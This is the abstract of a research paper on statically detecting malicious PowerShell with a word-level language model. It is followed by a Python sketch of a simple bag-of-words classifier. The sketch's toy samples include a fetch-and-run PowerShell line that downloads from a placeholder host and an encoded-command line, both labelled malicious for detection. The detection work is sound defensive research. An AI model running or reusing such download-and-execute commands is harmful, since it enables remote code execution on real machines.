Detection of Malicious PowerShell Using a Word-Level Language Model

田尻, 裕貴, 三村, 守

Cyberattacks increasingly abuse legitimate tools that are already installed on the target computer. In particular, abuse of PowerShell, provided by Microsoft, as an attack tool has been increasing every year and has become a problem. Previous work proposed a method for detecting malicious PowerShell commands using character-based deep learning. That method combines traditional natural language processing with a character-level convolutional neural network. However, it relies on dynamic analysis for preprocessing, which makes the analysis time-consuming. This paper proposes a method that uses only static analysis: a word-based language model builds feature vectors from malicious and benign samples, and these vectors are used to classify unknown samples. The dataset was built from benign and malicious samples obtained from HybridAnalysis and benign samples obtained from github. In the verification experiment, the F-measure reached 0.82. Furthermore, we confirmed that about 50% of unknown malicious samples could be detected.
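The static, word-level pipeline described in the abstract can be illustrated with a minimal sketch. The abstract does not name the language model or the classifier, so this example swaps in a plain bag-of-words vector and a nearest-centroid rule with cosine similarity. The tokenizer regex, the function names, and the toy scripts in `TOY_SAMPLES` are all hypothetical and are not taken from the paper or its dataset.

```python
import math
import re
from collections import Counter

# Assumption: a "word" is a run of letters, digits, underscores or hyphens
# that starts with a letter or underscore. The paper may tokenize differently.
TOKEN_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_-]*")


def tokenize(script):
    """Split script text into lowercase word tokens without executing it."""
    return [t.lower() for t in TOKEN_RE.findall(script)]


def vectorize(script):
    """Bag-of-words feature vector: token -> count."""
    return Counter(tokenize(script))


def centroid(vectors):
    """Average a list of bag-of-words vectors into one class centroid."""
    total = Counter()
    for v in vectors:
        total.update(v)
    return {word: count / len(vectors) for word, count in total.items()}


def cosine(a, b):
    """Cosine similarity between two sparse vectors stored as dicts."""
    dot = sum(a[w] * b.get(w, 0.0) for w in a)
    norm_a = math.sqrt(sum(x * x for x in a.values()))
    norm_b = math.sqrt(sum(x * x for x in b.values()))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)


def train(samples):
    """samples: iterable of (script, label). Returns label -> centroid."""
    by_label = {}
    for script, label in samples:
        by_label.setdefault(label, []).append(vectorize(script))
    return {label: centroid(vs) for label, vs in by_label.items()}


def classify(model, script):
    """Assign the label whose centroid is most similar to the script."""
    vec = vectorize(script)
    return max(model, key=lambda label: cosine(vec, model[label]))


def f_measure(y_true, y_pred, positive="malicious"):
    """F-measure: harmonic mean of precision and recall for one class."""
    pairs = list(zip(y_true, y_pred))
    tp = sum(1 for t, p in pairs if t == positive and p == positive)
    fp = sum(1 for t, p in pairs if t != positive and p == positive)
    fn = sum(1 for t, p in pairs if t == positive and p != positive)
    if tp == 0:
        return 0.0
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    return 2 * precision * recall / (precision + recall)


# Hypothetical toy samples, made up purely for illustration.
TOY_SAMPLES = [
    ("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
     "malicious"),
    ("powershell -NoProfile -EncodedCommand AAAA; IEX $payload", "malicious"),
    ("Get-ChildItem -Path C:\\Logs | Sort-Object Length", "benign"),
    ("Get-Process | Where-Object CPU -gt 10 | Format-Table Name", "benign"),
]

model = train(TOY_SAMPLES)
```

Calling `classify(model, script)` on an unseen script returns the label of the closest centroid, and `f_measure` scores a batch of predictions against known labels. A real evaluation would need a far larger labeled corpus and a held-out test split; four toy scripts say nothing about detection rates.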
